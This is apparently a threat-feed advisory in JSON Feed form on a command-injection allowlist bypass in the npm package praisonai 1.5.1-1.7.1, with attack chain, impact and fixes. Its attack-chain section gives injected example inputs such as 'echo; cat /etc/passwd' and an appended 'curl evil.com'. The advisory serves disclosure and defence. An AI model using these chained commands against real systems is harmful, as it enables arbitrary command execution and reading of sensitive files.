{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/products/praisonai-1.5.1-1.7.1/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["praisonai (1.5.1-1.7.1)"],"_cs_severities":["high"],"_cs_tags":["command-injection","npm-package","nodejs","rce","allowlist-bypass","ghsa"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe npm package \u003ccode\u003epraisonai\u003c/code\u003e has been identified with a command injection vulnerability (GHSA-5jv7-2mjm-h6qj) affecting versions 1.5.1 through 1.7.1. The \u003ccode\u003eutility-tools.shell()\u003c/code\u003e helper, located in \u003ccode\u003edist/tools/utility-tools.js\u003c/code\u003e, is designed to execute \u0026quot;safe read-only commands\u0026quot; by checking only the first whitespace-delimited token against an allowlist (e.g., \u003ccode\u003els\u003c/code\u003e, \u003ccode\u003ecat\u003c/code\u003e, \u003ccode\u003eecho\u003c/code\u003e). However, the function then passes the entire input string to Node.js's \u003ccode\u003echild_process.exec()\u003c/code\u003e, which executes it via a system shell. This policy/parser differential allows an attacker to prefix a malicious command with an allowed command and shell metacharacters (e.g., \u003ccode\u003eecho ok; malicious_command\u003c/code\u003e), bypassing the intended allowlist and executing arbitrary commands with the PraisonAI process's privileges. This flaw enables potential file system access, network exfiltration, or denial of service within applications using this vulnerable library.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access\u003c/strong\u003e: An attacker identifies an application or service that integrates the \u003ccode\u003epraisonai\u003c/code\u003e library (versions 1.5.1-1.7.1) and exposes functionality that processes user-controlled input through the vulnerable \u003ccode\u003eutility-tools.shell()\u003c/code\u003e helper.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCommand Crafting\u003c/strong\u003e: The attacker crafts a malicious command string. This string starts with a command found in \u003ccode\u003eutility-tools.shell()\u003c/code\u003e's \u003ccode\u003esafeCommands\u003c/code\u003e allowlist (e.g., \u003ccode\u003eecho\u003c/code\u003e, \u003ccode\u003els\u003c/code\u003e) followed by a shell metacharacter (e.g., \u003ccode\u003e;\u003c/code\u003e, \u003ccode\u003e\u0026amp;\u0026amp;\u003c/code\u003e, \u003ccode\u003e|\u003c/code\u003e) and the desired arbitrary command (e.g., \u003ccode\u003ecat /etc/passwd\u003c/code\u003e, \u003ccode\u003ecurl evil.com\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eVulnerable Function Call\u003c/strong\u003e: The crafted malicious command string is submitted as input to the vulnerable application. The application, in turn, passes this string to the \u003ccode\u003epraisonai\u003c/code\u003e's \u003ccode\u003eutility-tools.shell()\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAllowlist Check Bypass\u003c/strong\u003e: The \u003ccode\u003eutility-tools.shell()\u003c/code\u003e function performs its safety check by splitting the input string by whitespace and validating only the \u003cem\u003efirst token\u003c/em\u003e (e.g., \u003ccode\u003eecho\u003c/code\u003e) against its internal \u003ccode\u003esafeCommands\u003c/code\u003e allowlist. Since the first token is allowed, the check passes.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eShell Execution\u003c/strong\u003e: The function proceeds to pass the \u003cem\u003eentire, unaltered malicious command string\u003c/em\u003e (e.g., \u003ccode\u003eecho; cat /etc/passwd\u003c/code\u003e) to Node.js's \u003ccode\u003echild_process.exec()\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eArbitrary Command Execution\u003c/strong\u003e: \u003ccode\u003echild_process.exec()\u003c/code\u003e invokes the system's default shell (e.g., \u003ccode\u003esh -c\u003c/code\u003e on Linux, \u003ccode\u003ecmd.exe /c\u003c/code\u003e on Windows), which interprets the full string. The shell executes the initial allowed command, then, upon encountering the shell metacharacter, proceeds to execute the appended arbitrary command (e.g., \u003ccode\u003ecat /etc/passwd\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eImpact\u003c/strong\u003e: The arbitrary command is executed with the privileges of the PraisonAI application process, potentially leading to sensitive data exposure, file modification, network communication, or system disruption, depending on the command and process context.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eIf an application or service exposes the vulnerable \u003ccode\u003eutility-tools.shell()\u003c/code\u003e helper to untrusted input, the safe-command allowlist becomes ineffective. Attackers can execute arbitrary shell commands with the PraisonAI process privileges. The specific consequences are determined by the embedding application's context and permissions, but can include unauthorized reading of sensitive files and secrets (e.g., credentials, configuration files), modification of files or application state, invocation of local tools, network exfiltration of data if egress is permitted, and denial of service through resource-intensive commands. While no specific victim numbers are available, the broad applicability of Node.js applications means any sector using \u003ccode\u003epraisonai\u003c/code\u003e between versions 1.5.1 and 1.7.1 could be affected.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePatch Vulnerable Library\u003c/strong\u003e: Immediately update \u003ccode\u003epraisonai\u003c/code\u003e to a version higher than 1.7.1 (or explicitly prior to 1.5.1) to address GHSA-5jv7-2mjm-h6qj. The advisory suggests avoiding \u003ccode\u003eexec(command)\u003c/code\u003e for policy-checked strings and instead using \u003ccode\u003eexecFile()\u003c/code\u003e or \u003ccode\u003espawn()\u003c/code\u003e with \u003ccode\u003eshell: false\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDeploy Detection Rules\u003c/strong\u003e: Implement the provided Sigma rules to detect patterns indicative of this exploitation on both Linux/macOS and Windows hosts that run Node.js applications.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eReview Code for Vulnerable Usage\u003c/strong\u003e: Developers should review their codebase for any instances where \u003ccode\u003epraisonai/dist/tools/utility-tools.js\u003c/code\u003e is imported and its \u003ccode\u003eshell()\u003c/code\u003e function is called with user-controlled input. Refactor such calls to ensure input is properly sanitized or leverage safer alternatives as described in the \u0026quot;Suggested Fix\u0026quot; section of the advisory (GHSA-5jv7-2mjm-h6qj).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eEnable Detailed Process Logging\u003c/strong\u003e: Ensure \u003ccode\u003eprocess_creation\u003c/code\u003e logging (e.g., via Sysmon on Windows, Auditd/eBPF on Linux) is enabled and configured to capture full command lines, parent-child process relationships, and image paths to effectively utilize the provided Sigma rules.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-06-18T15:03:35Z","date_published":"2026-06-18T15:03:35Z","id":"https://feed.craftedsignal.io/briefs/2026-06-praisonai-shell-bypass/","summary":"The npm package `praisonai` versions 1.5.1 through 1.7.1 contains a command injection vulnerability (GHSA-5jv7-2mjm-h6qj) in its `utility-tools.shell()` helper, which allows attackers to bypass a 'safe read-only' command allowlist by appending arbitrary shell commands with metacharacters after an allowed command, leading to arbitrary code execution with the PraisonAI process privileges.","title":"npm PraisonAI utility-tools.shell() Allowlist Bypass via Shell Chaining (GHSA-5jv7-2mjm-h6qj)","url":"https://feed.craftedsignal.io/briefs/2026-06-praisonai-shell-bypass/"}],"language":"en","title":"CraftedSignal Threat Feed - Praisonai (1.5.1-1.7.1)","version":"https://jsonfeed.org/version/1.1"}